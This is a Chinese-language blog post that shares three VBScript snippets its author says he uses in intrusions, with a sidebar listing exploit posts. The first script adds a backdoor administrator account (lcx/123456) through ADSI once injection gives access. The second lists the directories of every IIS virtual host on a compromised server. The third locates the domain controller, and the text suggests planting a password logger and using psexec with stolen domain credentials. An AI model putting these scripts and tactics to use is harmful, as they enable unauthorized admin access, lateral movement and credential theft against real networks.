zzzevazzz在他的名篇<<深入挖掘Windows脚本技术>>的结语中说到：“Windows脚本就像万能胶，能够把独立的程序、服务、控件组合起来完成任务。脚本编程的技巧就是组合的技巧。XP和2003比2000自带更多的命令行工具，WMI也大大加强了，脚本的功能水涨船高，可以说是‘只有想不到，没有做不到’，一切有待你的发掘。”这话很有道理，如果只把VBS看作是一个编程工具，用作写一些方便自己的小工具，对我们学入侵的人来讲则有点浪费其才能了。vbs简单易用，在入侵中用到好的话，会有意想不到的效果，这期就把我日常自己写自己用的三则vbs代码以飨读者。

一、用VBS来加管理员帐号

经常看到有人在论坛上讨论，在注入过程中明明有了sa帐号，但是由于net.exe和net1.exe被限制，或其它的不明原因，总是加不了管理员帐号。VBS在活动目录（adsi）部份有一个winnt对像，可以用来管理本地资源，可以用它不依靠cmd等命令来加一个管理员，详细代码如下：

★
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","lcx") '建立用户
od.SetPassword "123456" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/lcx",user) '得到用户
oe.add os&"/lcx"
★

这段代码如果保存为1.vbs，在cmd下运行，格式: ●cscript 1.vbs●的话，会在当前系统加一个名字为lcx，密码为123456的管理员。当然，你可以用记事本来修改里边的变量lcx和123456，改成你喜欢的名字和密码值。

二、用vbs来列虚拟主机的物理目录

有时旁注入侵成功一个站，拿到系统权限后，面对上百个虚拟主机，怎样才能更快的找到我们目标站的物理目录呢？一个站一个站翻看太累，用系统自带的adsutil.vbs吧又感觉好像参数很多，有点无法下手的感觉，试试我这个脚本吧，代码如下：

★
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit
★

运行●cscript 2.vbs●后，就会详细列出IIS里的站点ID、描述、及物理目录，是不是代码少很多又方便呢？

三、快速找到内网域的主服务器

面对域结构的内网，可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码，整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上，如果能搞定其中的一台或几台，放个密码记录器之类，相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了，如何在成千台机器里判断出是哪一台呢？dos命令像●net group "domain admins" /domain●可以做为一个判断的标准，不过vbs也可以做到的，这仍然属于adsi部份的内容，代码如下：

★
set obj=GetObject("LDAP://rootDSE")
wscript.echo obj.servername
★

只用这两句代码就足够了，运行●cscript 3.vbs●，会有结果的。当然，无论是dos命令或vbs，你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码，你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell，或你的木马本来就是与桌面交互的，登陆你木马shell的又是域用户，就可以直接运行这些命令了。

vbs的在入侵中的作用当然不只这些，当然用js或其它工具也可以实现我上述代码的功能；不过这个专栏定下的题目是vbs在hacking中的妙用，所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目，争取为读者带来好的有用的文章。

分类: 矩阵毒刺标签:

Page 7 of 9« First...«5 678 9 »

Chinadu`s Blog

存档

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

ms08-066

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)

MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)

MS Windows GDI+ Proof of Concept (MS08-052) #2

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

RealPlayer 最新网马

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

我在入侵渗透中用过的三则VBS代码

About Me

最近文章

近期评论

热门文章

我的微博

分类目录

Blogroll

Archives

2010 九月
一	二	三	四	五	六	日
« 八
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30